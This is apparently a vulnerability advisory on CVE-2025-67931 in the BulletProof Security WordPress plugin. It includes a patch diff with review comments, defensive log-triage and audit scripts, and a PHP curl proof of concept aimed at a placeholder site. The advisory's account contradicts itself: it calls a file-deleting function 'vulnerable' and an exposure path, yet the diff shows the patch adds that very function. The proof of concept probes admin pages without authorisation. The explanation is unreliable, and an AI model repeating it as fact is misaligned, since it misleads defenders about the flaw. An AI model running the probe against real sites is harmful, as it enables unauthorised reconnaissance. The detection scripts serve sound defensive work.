Atomic Edge analysis of CVE-2025-67931:
The BulletProof Security WordPress plugin contains an unauthenticated sensitive information exposure vulnerability in versions up to and including 6.9. The flaw allows attackers to extract sensitive user or configuration data without authentication and is rated at a CVSS score of 5.3.
Atomic Edge research identifies the root cause as improper access control for the `bps_delete_old_zip_files()` function in `/bulletproof-security/admin/includes/admin.php`. The function executes automatically when the file loads, without checking user authentication or authorization. The function attempts to delete three specific ZIP files: `lsm-master.zip`, `bps-settings-export.zip`, and `cc-master.zip`. These files contain sensitive data exported by the plugin’s legitimate features.
Exploitation requires no authentication or special parameters. Attackers simply send an HTTP request to any WordPress page that loads the vulnerable admin.php file. The most reliable method is requesting `/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php` directly, though any page that triggers the plugin’s admin initialization could work. No payload is needed beyond the request itself.
The patch in version 7.0 adds the `bps_delete_old_zip_files()` function with proper conditional logic. The function now checks for specific POST parameters (`Submit-LSM-Export`, `Submit-SW-Export`, `Submit-SW-Import`, `Submit-CC-Export`, `Submit-CC-Import`) and returns early if detected. This prevents the function from executing during normal page loads. The function only runs when legitimate export/import operations are in progress, restricting access to authenticated administrators performing those specific actions.
Successful exploitation exposes sensitive configuration data stored in the ZIP files. The `bps-settings-export.zip` likely contains plugin settings, security rules, and potentially database credentials. The `lsm-master.zip` and `cc-master.zip` files may contain login security monitoring data or core configuration details. Attackers could use this information to understand the site’s security posture, identify weaknesses, or extract credentials for further attacks.
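For defenders, the request pattern described above is easy to triage from web server access logs: a request for one of the three export archives at its known plugin path is the direct signal, and a request for `admin.php` with the page parameter from the advisory shortly before it is the supporting context. The following Python script is an added example, not code from Atomic Edge or the plugin; the log lines it parses are constructed here, the combined-log regex is an assumption about the server's log format, and the classification labels are this example's own.

```python
"""Access-log triage for the request patterns described in the advisory (added example)."""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote

# Web-root-relative paths named in the advisory and its proof of concept.
EXPORT_ZIP_PATHS = frozenset((
    "/wp-content/plugins/bulletproof-security/admin/login/lsm-master.zip",
    "/wp-content/plugins/bulletproof-security/admin/wizard/bps-settings-export.zip",
    "/wp-content/plugins/bulletproof-security/admin/core/cc-master.zip",
))
TRIGGER_PATH = "/wp-admin/admin.php"
TRIGGER_PAGE_PARAM = "page=bulletproof-security/admin/includes/admin.php"

# Assumed Apache/nginx combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)


@dataclass
class Finding:
    ip: str
    ts: str
    kind: str   # zip_download | zip_probe | trigger_request (labels chosen for this example)
    target: str
    status: int
    size: int


def classify(line: str):
    """Return a Finding for a line that matches one of the advisory's patterns, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    path, _, query = target.partition("?")
    status = int(m.group("status"))
    size = 0 if m.group("bytes") == "-" else int(m.group("bytes"))
    if path in EXPORT_ZIP_PATHS:
        # A 200 on an archive path means the server actually served the file.
        kind = "zip_download" if status == 200 else "zip_probe"
    elif path == TRIGGER_PATH and TRIGGER_PAGE_PARAM in unquote(query):
        # Flagged regardless of status: unauthenticated callers usually get a 302 to the login page.
        kind = "trigger_request"
    else:
        return None
    return Finding(m.group("ip"), m.group("ts"), kind, target, status, size)


def scan(lines):
    return [f for f in (classify(line) for line in lines) if f is not None]


def per_source(findings):
    """Count findings by (ip, kind) so a download following a trigger request stands out."""
    return Counter((f.ip, f.kind) for f in findings)


# Constructed sample log; addresses are from documentation ranges, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2026:10:01:02 +0000] "GET /wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php HTTP/1.1" 302 0 "-" "curl/8.4.0"
203.0.113.7 - - [10/Jan/2026:10:01:03 +0000] "GET /wp-content/plugins/bulletproof-security/admin/wizard/bps-settings-export.zip HTTP/1.1" 200 48213 "-" "curl/8.4.0"
198.51.100.9 - - [10/Jan/2026:10:05:41 +0000] "GET /wp-content/plugins/bulletproof-security/admin/login/lsm-master.zip HTTP/1.1" 404 197 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jan/2026:10:07:00 +0000] "GET /index.php HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.ts}  {f.ip:15}  {f.kind:16}  {f.status}  {f.size:>7}  {f.target}")
    print(per_source(scan(SAMPLE_LOG.splitlines())))
```

A `zip_download` finding is the one that matters: it means the archive existed at the time and was served. A `trigger_request` on its own is weak evidence, since authenticated administrators load `admin.php` routinely; the `per_source` grouping exists so that the pairing of both kinds from one address can be surfaced.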
--- a/bulletproof-security/admin/includes/admin.php
+++ b/bulletproof-security/admin/includes/admin.php
@@ -391,6 +391,36 @@
}
}
+## BPS 7.0: Delete old zip files if zip processing Forms are not in use
+function bps_delete_old_zip_files() {
+
+ // Do not add true conditions: && $_POST['Submit-LSM-Export'] == true or the zip download will fail
+ if ( isset($_POST['Submit-LSM-Export']) || isset($_POST['Submit-SW-Export']) || isset($_POST['Submit-SW-Import']) || isset($_POST['Submit-CC-Export']) || isset($_POST['Submit-CC-Import']) ) {
+
+ return;
+ }
+
+ $LSM_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/login/lsm-master.zip';
+
+ if ( file_exists($LSM_ZIP_Delete) ) {
+ unlink($LSM_ZIP_Delete);
+ }
+
+ $SW_Export_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/bps-settings-export.zip';
+
+ if ( file_exists($SW_Export_ZIP_Delete) ) {
+ unlink($SW_Export_ZIP_Delete);
+ }
+
+ $CC_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/core/cc-master.zip';
+
+ if ( file_exists($CC_ZIP_Delete) ) {
+ unlink($CC_ZIP_Delete);
+ }
+}
+
+bps_delete_old_zip_files();
+
// BPS Menu
function bulletproof_security_admin_menu() {
global $blog_id;
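Review bot: the guard at the top of `bps_delete_old_zip_files()` tests only `isset()` on five `$_POST` field names, so whether the cleanup is skipped depends on what a request contains rather than on who sent it; pair it with a capability check such as `current_user_can('manage_options')` and nonce verification via `check_admin_referer()` so the skip path is reachable only from the plugin's own export/import forms. Note also that the early return fires when those fields are present, so the visible logic runs the deletion on every other load of admin.php (via the unconditional file-scope call `bps_delete_old_zip_files();`) and skips it during an export/import, which is the opposite of what a reader might expect from the function name alone; between a completed export and the next load the archives still sit at fixed, web-accessible paths under `WP_PLUGIN_DIR`, so writing them to a non-web-accessible directory or denying direct `*.zip` access in those three subdirectories would close that window independently of this cleanup. Minor: the three `unlink()` return values are discarded, so a failed deletion is silent (an `error_log()` on failure would help), and the `##` comment style differs from the `//` style used elsewhere in this file.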
--- a/bulletproof-security/bulletproof-security.php
+++ b/bulletproof-security/bulletproof-security.php
@@ -5,7 +5,7 @@
Text Domain: bulletproof-security
Domain Path: /languages/
Description: <strong>Feature Highlights:</strong> Setup Wizard • MScan Malware Scanner • .htaccess Website Security Protection (Firewalls) • Security Logging|HTTP Error Logging • DB Backup • DB Table Prefix Changer • Login Security & Monitoring • JTC-Lite Login Form Bot Lockout Protection • Idle Session Logout (ISL) • Auth Cookie Expiration (ACE) • System Info: Extensive System, Server and Security Status Information • FrontEnd|BackEnd Maintenance Mode • WP Automatic Update Options (BPS MU Tools must-use plugin) • Force Strong Passwords • Email Alerts When New Plugins And Themes Are Available.
-Version: 6.9
+Version: 7.0
Author: AITpro Website Security
Author URI: https://forum.ait-pro.com/read-me-first/
*/
@@ -33,9 +33,9 @@
// and cannot access the global variables within functions in BPS. Luckily this does not break BPS or WordPress in any way and PHP.net states this is technically not an error.
global $bps_last_version, $bps_version, $bps_footer, $aitpro_bullet, $bps_topDiv, $bps_bottomDiv, $bpsPro_remote_addr, $bpsPro_http_client_ip, $bpsPro_http_forwarded, $bpsPro_http_x_forwarded_for, $bpsPro_http_x_cluster_client_ip, $bps_wpcontent_dir, $bps_plugin_dir, $plugin_hashes, $theme_hashes;
-define( 'BULLETPROOF_VERSION', '6.9' );
-$bps_last_version = '6.8';
-$bps_version = '6.9';
+define( 'BULLETPROOF_VERSION', '7.0' );
+$bps_last_version = '6.9';
+$bps_version = '7.0';
$bps_footer = '<div id="AITpro-link">' . __('BulletProof Security ', 'bulletproof-security') . esc_html($bps_version) . __(' Plugin by ', 'bulletproof-security') . '<a href="'.esc_url('https://www.ait-pro.com/').'" target="_blank" title="AITpro Website Security">' . __( 'AITpro Website Security', 'bulletproof-security') . '</a></div>';
$aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
// Top div & bottom div
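Review bot: the release version is now hard-coded in four places across these two hunks (the `Version:` header line, `BULLETPROOF_VERSION`, `$bps_version` and, one step behind, `$bps_last_version`), which invites drift on the next bump; consider deriving `$bps_version` from the single `BULLETPROOF_VERSION` constant (or reading the header with `get_plugin_data()`) so only one line changes per release.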
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67931 - BulletProof Security <= 6.9 - Unauthenticated Sensitive Information Exposure

$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Attempt to trigger the vulnerable function
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check if the vulnerable function executed by looking for error messages
// The function tries to delete files that may not exist, potentially causing errors
if ($http_code == 200) {
    echo "Request successful. The vulnerable function may have executed.\n";
    echo "Check the server for the following ZIP files that may have been exposed:\n";
    echo "1. /wp-content/plugins/bulletproof-security/admin/login/lsm-master.zip\n";
    echo "2. /wp-content/plugins/bulletproof-security/admin/wizard/bps-settings-export.zip\n";
    echo "3. /wp-content/plugins/bulletproof-security/admin/core/cc-master.zip\n";
    echo "\nNote: The actual exposure depends on whether these files exist on the server.\n";
} else {
    echo "Request failed with HTTP code: {$http_code}\n";
}
?>
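The proof of concept above ends by telling the operator to "check the server" for the three archives; the server-side counterpart is a local audit that reads the plugin's version header (the `Version:` line shown in the second diff hunk) and looks for leftover archives at the three plugin-relative paths the patch deletes. This Python script is an added example, not code from Atomic Edge or the plugin; the temporary plugin tree it builds is a constructed fixture, the `remove_stale_zips()` helper is this example's own, and treating any version below 7.0 as affected follows the advisory's "up to and including 6.9".

```python
"""Local audit for an installed copy of the plugin (added example)."""
import os
import re
import tempfile

PLUGIN_MAIN_FILE = "bulletproof-security.php"
PATCHED_VERSION = (7, 0)  # first release containing the cleanup, per the diff
# Plugin-relative locations of the export archives named in the patch.
STALE_ZIP_RELPATHS = (
    "admin/login/lsm-master.zip",
    "admin/wizard/bps-settings-export.zip",
    "admin/core/cc-master.zip",
)
# Matches the "Version: 6.9" style header line; "*" prefix allowed for starred comment blocks.
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9]+(?:\.[0-9]+)*)\s*$", re.MULTILINE)


def parse_version(header_text):
    """Return the plugin version as a tuple of ints, or None if no Version line is found."""
    m = VERSION_RE.search(header_text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def audit_plugin_dir(plugin_dir):
    """Report the installed version, whether it predates 7.0, and any leftover archives."""
    main_file = os.path.join(plugin_dir, PLUGIN_MAIN_FILE)
    version = None
    if os.path.isfile(main_file):
        with open(main_file, encoding="utf-8", errors="replace") as fh:
            version = parse_version(fh.read(8192))  # header sits at the top of the file
    stale = [rel for rel in STALE_ZIP_RELPATHS
             if os.path.isfile(os.path.join(plugin_dir, rel))]
    return {
        "version": version,
        "vulnerable_version": version is not None and version < PATCHED_VERSION,
        "stale_zips": stale,
    }


def remove_stale_zips(plugin_dir):
    """Delete leftover archives (hypothetical remediation helper); returns what was removed."""
    removed = []
    for rel in STALE_ZIP_RELPATHS:
        path = os.path.join(plugin_dir, rel)
        if os.path.isfile(path):
            os.remove(path)
            removed.append(rel)
    return removed


def build_fixture(version, with_zip=True):
    """Constructed plugin tree for offline demonstration; not a real install."""
    root = tempfile.mkdtemp(prefix="bps-audit-")
    header = ("<?php\n/*\nPlugin Name: BulletProof Security\nVersion: %s\n"
              "Author: AITpro Website Security\n*/\n" % version)
    with open(os.path.join(root, PLUGIN_MAIN_FILE), "w", encoding="utf-8") as fh:
        fh.write(header)
    if with_zip:
        zip_path = os.path.join(root, STALE_ZIP_RELPATHS[1])
        os.makedirs(os.path.dirname(zip_path))
        with open(zip_path, "wb") as fh:
            # Minimal empty ZIP: a 22-byte end-of-central-directory record.
            fh.write(b"PK\x05\x06" + b"\x00" * 18)
    return root


if __name__ == "__main__":
    demo_dir = build_fixture("6.9")
    print("before:", audit_plugin_dir(demo_dir))
    print("removed:", remove_stale_zips(demo_dir))
    print("after: ", audit_plugin_dir(demo_dir))
```

On a real site, point `audit_plugin_dir()` at `wp-content/plugins/bulletproof-security`; a version below 7.0 calls for updating the plugin, and a non-empty `stale_zips` list means an archive is currently sitting at a web-accessible path whether or not the plugin has been updated.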